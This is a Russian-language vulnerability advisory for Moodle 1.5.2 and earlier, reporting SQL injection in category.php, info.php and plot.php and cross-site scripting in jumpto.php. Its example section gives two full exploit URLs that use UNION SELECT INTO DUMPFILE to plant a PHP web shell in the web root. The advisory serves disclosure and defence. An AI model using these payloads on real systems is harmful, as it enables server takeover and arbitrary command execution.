Программа: Moodle 1.5.2 и более ранние версии

Обнаруженные уязвимости позволяют
удаленному пользователю произвести XSS
нападение и выполнить произвольные SQL
команды в базе данных приложения.

1. Уязвимость обнаружена при обработке
входных данных в параметре “id” в сценариях
"category.php" и "info.php" и в параметре "user"
в сценарии "plot.php". Удаленный
пользователь может с помощью специально
сформированного запроса выполнит
произвольные SQL команды в базе данных
приложения. Для удачной эксплуатации
уязвимости опция "magic_quotes_gpc" должна
быть выключена.

Пример:

http://[target]/[path]/course/category.php?id='%20UNION
%20SELECT%200,'<?php%20system($_GET[cmd]);%20
?>',0,0,0,0,0,0%20INTO%20DUMPFILE%20'../../www/ moodle/shell.php'%20FROM%20
mdl_course_categories/*

http://[target]/[path]/course/info.php?id='UNION%20SELECT
%200,0,0,0,'<?php%20system($_GET[cmd]);%20?>',0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20INTO%20 DUMPFILE%20'../../www/moodle/shell.php
'%20FROM%20mdl_course/*

2. Межсайтовый скриптинг возможен из-за
недостаточной обработки входных данных в
параметре "jump" сценария "jumpto.php".
Удаленный пользователь может выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии